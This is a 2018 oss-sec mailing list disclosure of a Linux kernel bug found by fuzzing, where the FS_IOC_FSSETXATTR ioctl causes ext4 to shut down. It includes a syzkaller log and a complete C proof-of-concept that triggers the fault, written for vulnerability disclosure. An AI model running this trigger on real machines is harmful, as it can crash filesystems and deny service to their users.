oss-sec mailing list archives
Linux kernel: FS_IOC_FSSETXATTR will lead to EXT4-fs shut down
From: zhrzhang(张洪睿) <zhrzhang () tencent com>
Date: Tue, 28 Aug 2018 08:27:50 +0000
Hello:
when I fuzz,I found the kernel will always no output from machine, and error FS_IOC_FSSETXATTR contribute to
this.
the syzlog is as below:
r0 = creat(&(0x7f0000000140)='./file0\x00', 0x0)
ioctl$FS_IOC_FSSETXATTR(r0, 0x8004587d, &(0x7f0000000080)={0x0, 0x0, 0x0, 0x8})
the poc will show like this:
#define _GNU_SOURCE
#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
uint64_t r[1] = {0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
long res = 0;
memcpy((void*)0x20000140, "./file0", 8);
res = syscall(__NR_creat, 0x20000140, 0);
if (res != -1)
r[0] = res;
*(uint32_t*)0x20000080 = 0;
*(uint32_t*)0x20000084 = 0;
*(uint32_t*)0x20000088 = 0;
*(uint32_t*)0x2000008c = 8;
*(uint32_t*)0x20000090 = 0;
*(uint64_t*)0x20000098 = 0;
syscall(__NR_ioctl, r[0], 0x8004587d, 0x20000080);
return 0;
}
________________________________
zhrzhang(张洪睿)
Current thread:
- Linux kernel: FS_IOC_FSSETXATTR will lead to EXT4-fs shut down 张洪睿 (Aug 28)